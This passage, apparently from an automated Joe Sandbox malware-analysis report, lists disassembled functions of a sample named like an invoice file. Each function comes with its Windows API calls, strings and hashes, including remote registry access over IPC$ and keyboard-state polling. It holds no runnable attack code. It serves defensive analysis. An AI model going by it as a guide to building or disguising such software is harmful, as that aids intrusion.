DeleteMenu.USER32(00551708,00000004,00000000), ref: 004D5785
DeleteMenu.USER32(00551708,00000006,00000000), ref: 004D578D
DeleteMenu.USER32(00551708,00000003,00000000), ref: 004D5795
GetMenuItemCount.USER32(00551708), ref: 004D579D
SetMenuItemInfoW.USER32(00551708,00000004,00000000,00000030), ref: 004D57D3
GetCursorPos.USER32(?), ref: 004D57DD
SetForegroundWindow.USER32(00000000), ref: 004D57E6
TrackPopupMenuEx.USER32(00551708,00000000,?,00000000,00000000,00000000), ref: 004D57F9
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004D5805

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 001096385cbb050c2a255d07eda551bf2b41bdd7497b7f2e3bdc3cde269b2880
Instruction ID: c270481e63fb66ceef1321b8cae53dd792d69f53155b7e8782d171eacc4dabec
Opcode Fuzzy Hash: 001096385cbb050c2a255d07eda551bf2b41bdd7497b7f2e3bdc3cde269b2880
Instruction Fuzzy Hash: A5710630640A15BFEB209B15DC59FAABFA5FF41368F244207F5186A3D0CB789C10DB69

Function 004CA14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004CA1DC
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004CA211
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 004CA22D
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 004CA249
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 004CA273
CLSIDFromString.COMBASE(?,?), ref: 004CA29B
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 004CA2A6
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 004CA2AB

Strings

\CLSID, xrefs: 004CA193
SOFTWARE\Classes\, xrefs: 004CA17D
\IPC$, xrefs: 004CA1F3

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1687751970-22481851
Opcode ID: f67856bb70f7723c80156fcb3cdd88568a1c8a2675f10fe61717caf13570edf3
Instruction ID: 12155f43b0065bf9600cb011b93bf66c682654eb4596aa052007ac1c977d01eb
Opcode Fuzzy Hash: f67856bb70f7723c80156fcb3cdd88568a1c8a2675f10fe61717caf13570edf3
Instruction Fuzzy Hash: 7E410A76C1022DAACF11EBA5DC95DEEBB78FF14308F00406AF901A3260EB349E15DB54

Function 004F3C06 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,004F2BB5,?,?), ref: 004F3C1D

Strings

HKLM, xrefs: 004F3C81
HKEY_CURRENT_CONFIG, xrefs: 004F3CC0
HKEY_LOCAL_MACHINE, xrefs: 004F3C6C
HKEY_CURRENT_USER, xrefs: 004F3CE2
HKU, xrefs: 004F3D15
HKCC, xrefs: 004F3CD1
HKEY_USERS, xrefs: 004F3D04
HKEY_CLASSES_ROOT, xrefs: 004F3C96
HKCU, xrefs: 004F3CF3
HKCR, xrefs: 004F3CAB

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: b8d9c217f9ff31a26162d8c4d55ef1f074effa1ab09661b9640617a2a2790d5f
Instruction ID: 832405336ea7968e7fe5f3677ecc625c23557be6fee58f96c81ed47b71ace6a3
Opcode Fuzzy Hash: b8d9c217f9ff31a26162d8c4d55ef1f074effa1ab09661b9640617a2a2790d5f
Instruction Fuzzy Hash: 3E41403015028E8BDF04EF11D851AFB3765BF62359F10442AED651B296EB78AE0ACF58

Function 004D25B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,005036F4,00000010,?,Bad directive syntax error,0052DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 004D25D6
LoadStringW.USER32(00000000,?,005036F4,00000010), ref: 004D25DD
_wprintf.LIBCMT ref: 004D2610
__swprintf.LIBCMT ref: 004D2632
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 004D26A1

Strings

Line %d (File "%s"):, xrefs: 004D2647
Line %d:, xrefs: 004D262C
Error: , xrefs: 004D266F
., xrefs: 004D2687
%s (%d) : ==> %s.: %s %s, xrefs: 004D260B

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1080873982-4153970271
Opcode ID: 7424e88c9034b0cfb5d568f7402ecbb1847938f14820e4f84bd444a0b04ae2d1
Instruction ID: 11f3e7ea383f35417d081b55f13cabfa3b429b0f16c49a32f7adae783b50842a
Opcode Fuzzy Hash: 7424e88c9034b0cfb5d568f7402ecbb1847938f14820e4f84bd444a0b04ae2d1
Instruction Fuzzy Hash: 4A218531800319BFCF11AF91CC5AEEE7B35BF18308F00446AF505621A2EB75A619DB64

Function 004D7AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 004D7B42
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 004D7B58
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004D7B69
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 004D7B7B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 004D7B8C

Strings

play PlayMe, xrefs: 004D7B87
status PlayMe mode, xrefs: 004D7B3D
open , xrefs: 004D7AF1
play PlayMe wait, xrefs: 004D7B76
alias PlayMe, xrefs: 004D7B1B
close PlayMe, xrefs: 004D7B53, 004D7B80

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: SendString
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 890592661-1007645807
Opcode ID: a49222e71f7d3a2928f52fe2f16a06761d1d2d4249ac9073c16919d656bf8533
Instruction ID: 85d3a3c90320d9bf0ffb81a31b3e32dbb1aa7f2c82bc1687eb8a2d73e2a24204
Opcode Fuzzy Hash: a49222e71f7d3a2928f52fe2f16a06761d1d2d4249ac9073c16919d656bf8533
Instruction Fuzzy Hash: 6E11C4B1A8025979DB20B3A2CC9ADFF7E7CEB91B18F00042F7451A31D1EA681B45C6B4

Function 004D778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 004D7794

Part of subcall function 004ADC38: timeGetTime.WINMM(?,75A4B400,005058AB), ref: 004ADC3C

Sleep.KERNEL32(0000000A), ref: 004D77C0
EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 004D77E4
FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 004D7806
SetActiveWindow.USER32 ref: 004D7825
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 004D7833
SendMessageW.USER32(00000010,00000000,00000000), ref: 004D7852
Sleep.KERNEL32(000000FA), ref: 004D785D
IsWindow.USER32 ref: 004D7869
EndDialog.USER32(00000000), ref: 004D787A

Strings

BUTTON, xrefs: 004D77F8

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 1c4eef715ce5ed5c20fd0ef1d7b7daeb641c36428ea8a7002e035400b13ffc7f
Instruction ID: aea482b96522367e60efedaf188357aa5bf142e86277e78eeac41b8235d28bcb
Opcode Fuzzy Hash: 1c4eef715ce5ed5c20fd0ef1d7b7daeb641c36428ea8a7002e035400b13ffc7f
Instruction Fuzzy Hash: 11216274204305AFE7016B20ECADB663F39FB24389F41445BF50982361EB79AD08FA29

Function 004E02EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON

Download Yara Rule

APIs

Part of subcall function 0049936C: __swprintf.LIBCMT ref: 004993AB
Part of subcall function 0049936C: __itow.LIBCMT ref: 004993DF

CoInitialize.OLE32(00000000), ref: 004E034B
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 004E03DE
SHGetDesktopFolder.SHELL32(?), ref: 004E03F2
CoCreateInstance.COMBASE(0051DA8C,00000000,00000001,00543CF8,?), ref: 004E043E
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 004E04AD
CoTaskMemFree.COMBASE(?), ref: 004E0505
_memset.LIBCMT ref: 004E0542
SHBrowseForFolderW.SHELL32(?), ref: 004E057E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 004E05A1
CoTaskMemFree.COMBASE(00000000), ref: 004E05A8
CoTaskMemFree.COMBASE(00000000), ref: 004E05DF
CoUninitialize.COMBASE ref: 004E05E1

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: b535755bf193c47ed2b205107c2ffd5753dd42934adf48c7464bad8982b42db5
Instruction ID: f6ef029d8e8f33b26f9471d1c2f979d9ea4b6b314853d3698e3c3e38427cdb28
Opcode Fuzzy Hash: b535755bf193c47ed2b205107c2ffd5753dd42934adf48c7464bad8982b42db5
Instruction Fuzzy Hash: 56B10B74A00109AFDB04DFA5C888DAEBBB9FF48305B1484AAF815EB251DB74ED45CF54

Function 004D2E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 004D2ED6
SetKeyboardState.USER32(?), ref: 004D2F41
GetAsyncKeyState.USER32(000000A0), ref: 004D2F61
GetKeyState.USER32(000000A0), ref: 004D2F78
GetAsyncKeyState.USER32(000000A1), ref: 004D2FA7
GetKeyState.USER32(000000A1), ref: 004D2FB8
GetAsyncKeyState.USER32(00000011), ref: 004D2FE4
GetKeyState.USER32(00000011), ref: 004D2FF2
GetAsyncKeyState.USER32(00000012), ref: 004D301B
GetKeyState.USER32(00000012), ref: 004D3029
GetAsyncKeyState.USER32(0000005B), ref: 004D3052
GetKeyState.USER32(0000005B), ref: 004D3060

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 1889ae6cecbc54545296c5f301b391e81c6fcbba906e9bbe25c4fdfd60000dca
Instruction ID: bf3838666966fd6f8db2177efb0abcf28c7a776f6960cee3843a9c2f3a058047
Opcode Fuzzy Hash: 1889ae6cecbc54545296c5f301b391e81c6fcbba906e9bbe25c4fdfd60000dca
Instruction Fuzzy Hash: 2451B76060479429FB35DBA489207EBBBB45F21344F08859FD5C2563C2DA9C9B8CC76A

Function 004CED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 004CED1E
GetWindowRect.USER32(00000000,?), ref: 004CED30
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 004CED8E
GetDlgItem.USER32(?,00000002), ref: 004CED99
GetWindowRect.USER32(00000000,?), ref: 004CEDAB
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 004CEE01
GetDlgItem.USER32(?,000003E9), ref: 004CEE0F
GetWindowRect.USER32(00000000,?), ref: 004CEE20
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 004CEE63
GetDlgItem.USER32(?,000003EA), ref: 004CEE71
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 004CEE8E
InvalidateRect.USER32(?,00000000,00000001), ref: 004CEE9B

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 986eca1622ad0efe2edb79bb4c4662c4b0e166ef4e69ac12485d134a3bcfd580
Instruction ID: a89d911045845164c5ffd0e4a118d6d5c8120afba2a879b5dcb0a7c731bc00b1
Opcode Fuzzy Hash: 986eca1622ad0efe2edb79bb4c4662c4b0e166ef4e69ac12485d134a3bcfd580
Instruction Fuzzy Hash: A8512EB5B00205AFDB18CFA9DD85FAEBBBAEB98300F14812DF51AD7290D7749D448B14

Function 004AB40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON

Download Yara Rule

APIs

Part of subcall function 004AB526: GetWindowLongW.USER32(?,000000EB), ref: 004AB537

GetSysColor.USER32(0000000F), ref: 004AB438

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 5d69716f1cc4c901ec2b65067e48e22f7f5c51bce25e8d28ce1ae8bf758f548d
Instruction ID: 083936d2836dcecae44056975693cd88195094475a35cfdcd7535fb945d3d6e0
Opcode Fuzzy Hash: 5d69716f1cc4c901ec2b65067e48e22f7f5c51bce25e8d28ce1ae8bf758f548d
Instruction Fuzzy Hash: 52419330040140AFDB215F68DC89BB93B66EB2A731F1482A6FDA58E1E7D7348C42D7B5

Function 004D690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON

Download Yara Rule

APIs

_wcschr.LIBCMT ref: 004D6923
_wcscpy.LIBCMT ref: 004D6934
__wsplitpath.LIBCMT ref: 004D6958
__wsplitpath.LIBCMT ref: 004D6979
_wcscpy.LIBCMT ref: 004D699B
_wcscpy.LIBCMT ref: 004D69B9
_wcscpy.LIBCMT ref: 004D69C7
_wcscat.LIBCMT ref: 004D69D6
_wcscat.LIBCMT ref: 004D6A2B
_wcscat.LIBCMT ref: 004D6A61
_wcscat.LIBCMT ref: 004D6A73

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
String ID:
API String ID: 136442275-0
Opcode ID: b4431866fc04a935be87a3416b71c1ccafaf3fe5dc822de4f75f88e8b77a4a6b
Instruction ID: e70bcff66498411cc0efac89fd787d635b854e3b3d8ea1a3fd01c49a6295b71f
Opcode Fuzzy Hash: b4431866fc04a935be87a3416b71c1ccafaf3fe5dc822de4f75f88e8b77a4a6b
Instruction Fuzzy Hash: 1D414F7684511CAECF65DB95CC95DCB73BCEB44300F0041E7B689A2151EB34ABE98F68

Function 004DD76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(0052DC00,0052DC00,0052DC00), ref: 004DD7CE
GetDriveTypeW.KERNEL32(?,00543A70,00000061), ref: 004DD898
_wcscpy.LIBCMT ref: 004DD8C2

Strings

unknown, xrefs: 004DD859
cdrom, xrefs: 004DD7EA
all, xrefs: 004DD7D4
removable, xrefs: 004DD800
ramdisk, xrefs: 004DD842
fixed, xrefs: 004DD816
network, xrefs: 004DD82C

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: a916af1ce38b195741be60626f77177d6148362bf38caf4fa409a224f6edd8f5
Instruction ID: 692914831592777b99442c6b09a75fd2f99d3c81277939564378a94277a687c5
Opcode Fuzzy Hash: a916af1ce38b195741be60626f77177d6148362bf38caf4fa409a224f6edd8f5
Instruction Fuzzy Hash: 81519231544200AFC700FF15D8A1AABBBA5FF95318F10892FF4AA573A2DB35DD05DA4A

Function 0049936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 004993AB
__itow.LIBCMT ref: 004993DF

Part of subcall function 004B1557: _xtow@16.LIBCMT ref: 004B1578

Strings

False, xrefs: 00504C93
True, xrefs: 00504C8C
0x%p, xrefs: 00504CAD
%.15g, xrefs: 004993A5

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: __itow__swprintf_xtow@16
String ID: %.15g$0x%p$False$True
API String ID: 1502193981-2263619337
Opcode ID: aa3edf38982e12fd8677b26187f471e43f94483582ab3b380b1bf62a135191f6
Instruction ID: e1b29bb25f546a658b8768151e689b45dd313ec91d6cf229ac23b24e246408d8
Opcode Fuzzy Hash: aa3edf38982e12fd8677b26187f471e43f94483582ab3b380b1bf62a135191f6
Instruction Fuzzy Hash: 4441E371500204AFEF249F69D942EAABBE8BB48304F20447FE54AD71D1EA359D42CB65

Function 004FA1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 004FA259
CreateCompatibleDC.GDI32(00000000), ref: 004FA260
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 004FA273
SelectObject.GDI32(00000000,00000000), ref: 004FA27B
GetPixel.GDI32(00000000,00000000,00000000), ref: 004FA286
DeleteDC.GDI32(00000000), ref: 004FA28F
GetWindowLongW.USER32(?,000000EC), ref: 004FA299
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 004FA2AD
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004FA2B9

Strings

static, xrefs: 004FA1F1

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

